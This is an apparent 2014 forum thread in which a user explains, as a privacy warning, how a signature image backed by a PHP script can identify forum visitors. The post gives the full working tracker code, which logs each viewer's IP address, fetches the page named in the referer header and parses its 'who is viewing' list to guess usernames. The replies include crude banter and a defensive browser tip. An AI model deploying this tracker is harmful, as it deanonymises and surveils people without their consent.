Author Topic: Why you should hide your online status on forums  (Read 797 times)

0 Members and 1 Guest are viewing this topic.

Offline burroughs

  • Adherent
  • *
  • Posts: 62
    • View Profile
Why you should hide your online status on forums
« on: November 17, 2014, 01:47:28 am »
NOTE: Refresh this page once it loads for this first time to get the full effect. The referer is not set to this thread when clicking into it elsewhere.

This is a rehash of a post I made on &T2 awhile back.



What's going on?

PHP scripts can output images with the appropriate libraries - these scripts can be referenced as images in html and BB code just as any static file might be. But we can do whatever we want in our script before returning content, and we can do some pretty naughty things. Specifically:

  • Embed a script on a forum signature that outputs an image.
  • When a user loads this image, the http referer header will be the previous page they came from.
  • Using this referer value, we can make an http request back to the same page and parse the HTML looking for the "... is viewing this topic"
  • Even if there are multiple people viewing, we can make a guess at an IP address if we log enough requests through a process of elimination. We can also track their viewing habits over time.
  • We can disguise our image with some nice pr0n instead of politely informing a user that we know who they are.

Things we learned
  • You should always hide your online status on forums.
  • It's a bad idea to allow users to reference external resources, especially in areas with a lot of exposure like signatures.

Code

Code: [Select]
[img]http://bursylursy.webatu.com/tracking.php[/img]
Code: [Select]
<?php
header
("Pragma-directive: no-cache");
header("Cache-directive: no-cache");
header("Cache-control: no-cache");
header("Pragma: no-cache");
header("Expires: 0");

error_reporting(0);
$ip =  $_SERVER["REMOTE_ADDR"];
$ref $_SERVER["HTTP_REFERER"];
$displayusers "";

if (
strlen($ref) > 0) {
header("Content-type: image/png");
$response file_get_contents($ref);
$doc = new DOMDocument();
$doc->loadHTML($response);
$users $doc->getElementById("whoisviewing")->nodeValue;

if (strpos($users"Members") === false) {
$displayusers "You are probably one of these users: " substr($users0strpos($users" and"));
}

$im imagecreate(90070);
$bg imagecolorallocate($im255255255);
$textcolor imagecolorallocate($im00255);

imagestring($im555"Your ip address is: " $ip$textcolor);
imagestring($im5525"You are viewing this page: " $ref$textcolor);
imagestring($im5545$displayusers$textcolor);

imagepng($im);
imagedestroy($im);
} else {
header("Content-type: image/jpeg");
$im imagecreatefromjpeg("http://www.quickmeme.com/img/fa/fa3e19ffd513583d5f7ae60382262d9a0505d72589cd2374af2b2a7de75e057d.jpg");
imagejpeg($im);
imagedestroy($im);
}
?>

« Last Edit: November 17, 2014, 01:56:54 am by burroughs »

Offline BallsDeep69

  • Arch Disciple
  • ***
  • Posts: 613
  • So skilled, I trolled Arnox and got away with it..
    • View Profile
Re: Why you should hide your online status on forums
« Reply #1 on: November 17, 2014, 02:06:29 am »
*gasp*
My will, as it were.
To Zek, get over the fucking kittens man.

To RisiR, you'll always be my favourite hater.

To -SpectraL, you're one of the only people here who can insult Arnox without ramming it down his throat.

To Arnox, fuck you.

Offline stdio.h

  • Devotee
  • **
  • !
  • Posts: 107
    • View Profile
Re: Why you should hide your online status on forums
« Reply #2 on: November 17, 2014, 02:17:32 am »
I highly recommend using the JonDoFox Firefox profile. In addition to having NoScript enabled by default, it hides the referer when switching domains, preventing this type of attack.